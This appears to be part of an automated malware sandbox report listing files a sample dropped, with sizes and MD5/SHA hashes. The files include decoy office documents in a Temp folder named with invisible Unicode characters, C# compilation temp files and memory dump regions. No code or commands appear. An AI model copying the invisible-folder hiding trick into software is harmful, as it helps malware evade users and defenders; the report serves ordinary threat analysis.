3eec5e7c180573fbcb48017c2da7e6691f05d5b5fe6e538a932072d19526fade2d2415b00ab2b54bdebd5bad44a2c08e821c34de788256ef74022aeb8fb55315

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ ‌  \Common Files\Desktop\BlockDebug.docx

Filesize
13KB

MD5
4aa7720ad06cd3a44f6bb492f4054a5a

SHA1
7e6e8824e9112cb4725b5095bb5926e3cc01cfd5

SHA256
ac9be75c10452529b9507a9da9d23a38201ba470450694bf61018d891e0ce61a

SHA512
f9277b9d785caf0bd2ec6dfdb2e40e856e28937f5259e089b9b9e4698c385a3180d9ec5cb993fc4aa8edccb6a4e33142ec2c6df69da4ac52672c2142fb382a89

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ ‌  \Common Files\Desktop\ConnectComplete.txt

Filesize
498KB

MD5
7fd2a2352a376ca87b91e7ea583c0a4d

SHA1
f6353267667aa6c1076c50673c9fed1639eb151f

SHA256
1ad46f75ba025d9943bb373d7c5c3cb024edf74aa6871c5d742c284210230429

SHA512
728ea39f662cb87e67ed53f8bf1bcfcca430104d4da68abf88205670666b78846fd84e9a30e82601bf3feef3c3c8405840346dcbf171b7a580f13f0110f961e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ ‌  \Common Files\Desktop\LockResume.mp3

Filesize
231KB

MD5
5f975c174d57a776fa604a32abdc71ca

SHA1
1915835aacf2fd27142af16a8d69395f1cdc5bd8

SHA256
3d27b340d908b3c464941b39d69f3573ad76ed5f2cf41eaea982897bcf89acd6

SHA512
5a2296783a6af36c623f4c5f0d710fe04103560b84a99c98e2cf61c2a02bb90fb9f1f1cdb2eb9936c459b16e795289f7e945904334cf53390cebc9f0332b79b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ ‌  \Common Files\Desktop\RemoveExport.xlsx

Filesize
9KB

MD5
0af2e058940aa7c171cd01f0090c658e

SHA1
f4e660fadc93167bd337eb595f19a309d957a38f

SHA256
384561df972482e185feed13b22e5b492d292a43095a05b48432230eeb01374b

SHA512
da3d2fc617418eb5b5cbf581dc275c0e0efbaa39afb207645a498f0667fe761ff01a96b26f7feffce37929bb59065b925ea5fab480727985325cf14f7b8002ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ ‌  \Common Files\Desktop\SelectLock.xlsx

Filesize
10KB

MD5
9b4d91b04967d5e5c8cb8d6e783f5563

SHA1
a3cc66ae5d1f985889317552580d924798133e0f

SHA256
423560167ed8da1e240a068cdb0d81fbbc70ace4d2a69af6d5a8ab4af387c0f4

SHA512
c9d3662cf35f37dcb432fc19d2cd6142fe7eedbd8cad33c1343cde58efd0295b7a3fc9d01d8bc82ca771302226677b00a1b010d44399eaab13a4df7ce06c72e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ ‌  \Common Files\Desktop\UnpublishStep.docx

Filesize
16KB

MD5
d289e28aabdb1a15ad99dfb03eae1a99

SHA1
74a5e6dad94b8a718e9a56f1f61227b664773393

SHA256
7f3107c234bae3103aaa2991d36b39ce37c4b5861e7242a41fcf028bfd503ec3

SHA512
351845c0348496dc569484b93baa4b2e32716a17201401e0f4f0c7a568e57bda7e57f7bc553b6b86314818931191fe0dd43f64883100ca2a296c18bfbfc33618

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ ‌  \Common Files\Documents\BackupFind.dotm

Filesize
717KB

MD5
37f16daed1b8abced7c927f2eef6dc0f

SHA1
cc8bb4e21eb766f23f90c8ae8bbf9327379bc240

SHA256
c8a211cfbea7b54ed2efbab3184048dbadba2eb63f2e27e9b7a35bce3e595cdd

SHA512
cc23fc0933a1246791598a05758cc4e25f8cd7b343aa18230ade8edc792d7c768b5a7d49cfd1aad3f3ccef69c30696694f23d77cf8655e2f9f5365707516cc58

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ ‌  \Common Files\Documents\BackupUninstall.vsdm

Filesize
499KB

MD5
79df37f116732888473c4cad1cc88adf

SHA1
65733332298fdb216a50144db8e87a0f6cf8ceb3

SHA256
e1b6b3c02128231e64154206570056ba27121d330146bb360ea259f7f5c8dc9f

SHA512
cef2a0b2bf9754bbc66b4280bc9604f5fd84e587fa0f0e21b2ddc8abc69091b9227aa6f6ce743ec346d5bfbc3799bc2ece2ca49ebac1bc6b368be8aed92ac2e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ ‌  \Common Files\Documents\BlockRedo.docx

Filesize
17KB

MD5
545180fb335bdb929848eda3b7a7869b

SHA1
66611d315a0e4d38d6a008bacdcdd427b33dddd5

SHA256
a08892d22f3074600647afe22f3a82c72d0b27865bd1279f7c3ac47ca14a2279

SHA512
02bae68737b05bd1468e6d148a433897cc675e396cd0d11babf1338e04d34cd0c09d7101be177ce3baac3119ee7caf56d035a9ee0aa0dece9dbd49753b29cd5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ ‌  \Common Files\Documents\CheckpointResize.doc

Filesize
780KB

MD5
bbd324ba50dcea4b20faddcdae44ba83

SHA1
7fc960e6cfc05e05a37e1562b87c6fd4d0e3e5e3

SHA256
f7af2ad24ba9e75b147d1f5fbbdfbaec78a2c030eea3500e153bc7521f259e02

SHA512
893397924f661ac60a8b0a56226f3bd5c45763759a30ba36aa7573dadc411941933d61a1d6ded27647666f6339743c34b91c8d526960bc2481ac4d0d5351c0fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ ‌  \Common Files\Documents\ConnectEdit.csv

Filesize
748KB

MD5
a07627fa6887e1b95d2a9e383e7b9b40

SHA1
cb9a9e48caa58b0cca87974d94af90aebc543113

SHA256
5251b2ed85340c91bcf38b8261789225e4a5a2fa2007fa9df2370fa0c7b50b20

SHA512
7aa50d0e2ff8e3ab39ad67e579c7a2688c11928c843f2be11d3dcc3982b02f3aeddd891119c6c36a1f026ba976e3de970ac58fc7f5834557f7b8d7bf128530fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ ‌  \Common Files\Documents\ConnectPing.docx

Filesize
16KB

MD5
59b9c65e630062098a9070253ed65e06

SHA1
7694d14cbd9e928fd4aec1a84c90e728ba45d1ad

SHA256
9ba05bd4c2d500b997d42b4328e382ca63b7f7a189da38ebeb39fb522810d0e0

SHA512
9b9330692aa2963c465c3ddd0d70e52f9381489a1536e2541ec27ef2ef7ece23525951c46f1a986de58732c1639bf2ceb66dadd5f75470689922b695ef36dc2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏ ‌ ‌  \Common Files\Documents\ConvertFromSwitch.doc

Filesize
592KB

MD5
e1e4cdebaf803c122801268d4ae48547

SHA1
73c2fb95b969359abc314dc25764663666fd1b6d

SHA256
05b4e9535d6e480144875d295befec4b0ba281324cfb633bb3f7a6bc889e86da

SHA512
0c9f1d4c99d876cb15ae5fb9c0a0addaf09729b1b47aed7633a4f76078e115ec79ccc13773628299dfdda746c5f12ac45c6e1a5a050342674d6edd0e5b55b93c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s2n4cnmj\CSCDDD0243F551441AE98E59869F43D5D0.TMP

Filesize
652B

MD5
ee5428c72e4c32eb5b543bc4f96e0663

SHA1
16a0c57099e72ee94b5d220098c082a9584dc635

SHA256
44ab43ef3f96d14a3b9dbcc78784d8b31608ba207ac1f4e6340e33209b7fd866

SHA512
1f2cea218ff74d70116d404bb41ab3e4186664f210872965938afe442cfc76ce013bbd049ecc37c18f6f17c79d26800c3c042dd9f2572b6825df72bc0cee0136

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s2n4cnmj\s2n4cnmj.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\s2n4cnmj\s2n4cnmj.cmdline

Filesize
607B

MD5
eb773abbc52e24c3efa60b3ba662566c

SHA1
07d153c7c13c7dabaf7f7b176841e96c1618937e

SHA256
07aefb381ae808dd86616a9d33acaaee4ecbebb647a48f83c79723f59d6027b0

SHA512
64795978da62f7b3a2a2bde760bf6e8f2dfddaa3a575fd335f073e49c71fc16616e3fcfb9e66be830fbb87c709cba217119b295db6547b7dfa7f2318a7b778df

Download Submit
memory/1848-209-0x0000027731390000-0x0000027731398000-memory.dmp

Filesize
32KB

Download
memory/1956-86-0x0000026D6F6C0000-0x0000026D6F6E2000-memory.dmp

Filesize
136KB

Download
memory/3540-54-0x00007FF99CC00000-0x00007FF99CC2D000-memory.dmp

Filesize
180KB

Download
memory/3540-78-0x00007FF999DA0000-0x00007FF999DAD000-memory.dmp

Filesize
52KB

Download
memory/3540-68-0x00007FF989D40000-0x00007FF98A32E000-memory.dmp

Filesize
5.9MB

Download
memory/3540-72-0x00007FF989810000-0x00007FF989D32000-memory.dmp

Filesize
5.1MB

Download
memory/3540-106-0x00007FF998BC0000-0x00007FF998D36000-memory.dmp

Filesize
1.5MB

Download
memory/3540-73-0x00007FF99CC60000-0x00007FF99CC84000-memory.dmp

Filesize
144KB

Download
memory/3540-74-0x000002BD25310000-0x000002BD25832000-memory.dmp

Filesize
5.1MB

Download
memory/3540-71-0x00007FF998DC0000-0x00007FF998E8D000-memory.dmp

Filesize
820KB

Download
memory/3540-278-0x00007FF9990E0000-0x00007FF999113000-memory.dmp

Filesize
204KB

Download
memory/3540-280-0x00007FF998DC0000-0x00007FF998E8D000-memory.dmp

Filesize
820KB

Download
memory/3540-66-0x00007FF9990E0000-0x00007FF999113000-memory.dmp

Filesize
204KB

Download
memory/3540-63-0x00007FF9994C0000-0x00007FF9994D9000-memory.dmp

Filesize
100KB

Download
memory/3540-64-0x00007FF99CE40000-0x00007FF99CE4D000-memory.dmp

Filesize
52KB

Download
memory/3540-60-0x00007FF998BC0000-0x00007FF998D36000-memory.dmp

Filesize
1.5MB

Download
memory/3540-58-0x00007FF999DB0000-0x00007FF999DD3000-memory.dmp

Filesize
140KB

Download
memory/3540-56-0x00007FF99CB10000-0x00007FF99CB29000-memory.dmp

Filesize
100KB

Download
memory/3540-105-0x00007FF999DB0000-0x00007FF999DD3000-memory.dmp

Filesize
140KB

Download
memory/3540-48-0x00007FF99FC10000-0x00007FF99FC1F000-memory.dmp

Filesize
60KB

Download
memory/3540-30-0x00007FF99CC60000-0x00007FF99CC84000-memory.dmp

Filesize
144KB

Download
memory/3540-25-0x00007FF989D40000-0x00007FF98A32E000-memory.dmp

Filesize
5.9MB

Download
memory/3540-76-0x00007FF999340000-0x00007FF999354000-memory.dmp

Filesize
80KB

Download
memory/3540-109-0x00007FF9994C0000-0x00007FF9994D9000-memory.dmp

Filesize
100KB

Download
memory/3540-80-0x00007FF989200000-0x00007FF98931C000-memory.dmp

Filesize
1.1MB

Download
memory/3540-297-0x000002BD25310000-0x000002BD25832000-memory.dmp

Filesize
5.1MB

Download
memory/3540-296-0x00007FF989810000-0x00007FF989D32000-memory.dmp

Filesize
5.1MB

Download
memory/3540-304-0x00007FF989D40000-0x00007FF98A32E000-memory.dmp

Filesize
5.9MB

Download
memory/3540-310-0x00007FF998BC0000-0x00007FF998D36000-memory.dmp

Filesize
1.5MB

Download
memory/3540-305-0x00007FF99CC60000-0x00007FF99CC84000-memory.dmp

Filesize
144KB

Download
memory/3540-348-0x00007FF989200000-0x00007FF98931C000-memory.dmp

Filesize
1.1MB

Download
memory/3540-349-0x00007FF989810000-0x00007FF989D32000-memory.dmp

Filesize
5.1MB

Download
memory/3540-358-0x00007FF998DC0000-0x00007FF998E8D000-memory.dmp

Filesize
820KB

Download
memory/3540-357-0x00007FF9990E0000-0x00007FF999113000-memory.dmp

Filesize
204KB

Download
memory/3540-356-0x00007FF9994C0000-0x00007FF9994D9000-memory.dmp

Filesize
100KB

Download
memory/3540-355-0x00007FF99CE40000-0x00007FF99CE4D000-memory.dmp

Filesize
52KB

Download
memory/3540-354-0x00007FF999DB0000-0x00007FF999DD3000-memory.dmp

Filesize
140KB

Download
memory/3540-353-0x00007FF99CB10000-0x00007FF99CB29000-memory.dmp

Filesize
100KB

Download
memory/3540-352-0x00007FF99CC00000-0x00007FF99CC2D000-memory.dmp

Filesize
180KB

Download
memory/3540-351-0x00007FF99FC10000-0x00007FF99FC1F000-memory.dmp

Filesize
60KB

Download
memory/3540-350-0x00007FF99CC60000-0x00007FF99CC84000-memory.dmp

Filesize
144KB

Download
memory/3540-340-0x00007FF998BC0000-0x00007FF998D36000-memory.dmp

Filesize
1.5MB

Download
memory/3540-347-0x00007FF999DA0000-0x00007FF999DAD000-memory.dmp

Filesize
52KB

Download
memory/3540-346-0x00007FF999340000-0x00007FF999354000-memory.dmp

Filesize
80KB

Download
memory/3540-334-0x00007FF989D40000-0x00007FF98A32E000-memory.dmp

Filesize
5.9MB

Download